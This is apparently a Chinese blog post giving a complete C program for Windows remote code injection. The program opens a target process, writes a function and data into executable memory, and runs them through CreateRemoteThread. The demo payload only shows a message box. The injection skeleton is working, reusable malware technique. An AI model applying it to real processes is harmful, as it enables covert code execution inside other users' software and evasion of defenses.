• C语言实现远程代码注入


    #include <windows.h>
    #include <iostream>
    #define STRLEN 20
    
    typedef struct _DATA
    {
        DWORD dwLoadLibrary;
        DWORD dwGetProcAddress;
        DWORD dwGetModuleHandle;
        DWORD dwGetModuleFileName;
    
        char User32Dll[STRLEN];
        char MessageBox[STRLEN];
        char Str[STRLEN];
    }DATA, *PDATA;
    
    DWORD WINAPI RemoteThreadProc(LPVOID lpParam)
    {
        PDATA pData = (PDATA)lpParam;
    
        //定义API函数原型
        HMODULE (__stdcall *MyLoadLibrary)(LPCTSTR);
        FARPROC (__stdcall *MyGetProcAddress)(HMODULE, LPCSTR);
        HMODULE (__stdcall *MyGetModuleHandle)(LPCTSTR);
        int (__stdcall *MyMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT);
        DWORD (__stdcall *MyGetModuleFileName)(HMODULE, LPTSTR, DWORD);
    
        //对各函数地址进行赋值
        MyLoadLibrary = (HMODULE (__stdcall *)(LPCTSTR))pData->dwLoadLibrary;
        MyGetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))pData->dwGetProcAddress;
        MyGetModuleHandle = (HMODULE (__stdcall *)(LPCTSTR))pData->dwGetModuleHandle;
        MyGetModuleFileName = (DWORD (__stdcall *)(HMODULE, LPTSTR, DWORD))pData->dwGetModuleFileName;
    
        //加载user32.dll
        HMODULE hModule = MyLoadLibrary(pData->User32Dll);
        //获得MessageBoxA的函数地址
        MyMessageBox = (int (__stdcall *)(HWND, LPCTSTR, LPCTSTR, UINT))
                            MyGetProcAddress(hModule, pData->MessageBox);
        char szModuleFileName[MAX_PATH] = {0};
        MyGetModuleFileName(NULL, szModuleFileName, MAX_PATH);
    
        MyMessageBox(NULL, pData->Str, szModuleFileName, MB_OK);
    
        return 0;
    }
    
    
    void InjectCode(DWORD dwPid)
    {
        //打开进程并获取进程句柄
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE,dwPid);
     
        if(NULL== hProcess)
           return;
     
        DATA Data = {0};
     
        //获取kernel32.dll中相关的导出函数
        Data.dwLoadLibrary= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
        Data.dwGetProcAddress= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
        Data.dwGetModuleHandle= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA");
        Data.dwGetModuleFileName= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleFileNameA");
    
        //需要的其他dll和导出函数
        lstrcpy(Data.User32Dll,"user32.dll");
        lstrcpy(Data.MessageBox,"MessageBoxA");
        //提示字符串
        lstrcpy(Data.Str,"Code Inject !!!");
     
        //在目标进程中申请空间
        LPVOID lpData = VirtualAllocEx(hProcess, NULL, sizeof(Data),
                         MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        DWORD dwWriteNum = 0;
        WriteProcessMemory(hProcess,lpData, &Data,sizeof(Data), &dwWriteNum);
     
        //在目标进程空间中申请用于保存代码的长度
        WORD dwFunSize = 0x4000;
        LPVOID lpCode = VirtualAllocEx(hProcess, NULL, dwFunSize,
                         MEM_COMMIT,PAGE_EXECUTE_READWRITE);
     
        WriteProcessMemory(hProcess,lpCode,&RemoteThreadProc,
                         dwFunSize,&dwWriteNum);
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                         (LPTHREAD_START_ROUTINE)lpCode,
                         lpData,0, NULL);
        WaitForSingleObject(hThread,INFINITE);
     
        CloseHandle(hThread);
        CloseHandle(hProcess);
    }
    
    int GetProcessID(char *Name)
    {
        HWND Pid=::FindWindow(NULL,Name);
        DWORD Retn;
        ::GetWindowThreadProcessId(Pid,&Retn);
        return Retn;
    }
    
    int main()
    {
    
        int ppid;
    
        ppid = ::GetProcessID("lyshark.exe");
        InjectCode(ppid);
    
    
        return 0;
    }
  • 相关阅读:
    【译】SQL Server误区30日谈Day3即时文件初始化特性可以在SQL Server中开启和关闭
    有关TSQL的10个好习惯
    【译】SQL Server误区30日谈Day6有关NULL位图的三个误区
    一次由重复索引导致的问题
    【译】SQL Server误区30日谈Day2DBCC CHECKDB会导致阻塞
    【译】SQL Server误区30日谈Day1正在运行的事务在服务器故障转移后继续执行
    CodeFileBaseClass 属性
    Mako 模板系统文档翻译(2) 语法
    终于搞定了 django 的 ajax 方式上传图片
    ASP.NET Ajax 调试技巧:用 FireBug 调试 UpdatePanel 不更新问题
  • 原文地址:https://www.cnblogs.com/LyShark/p/11066070.html
Copyright © 2020-2023  润新知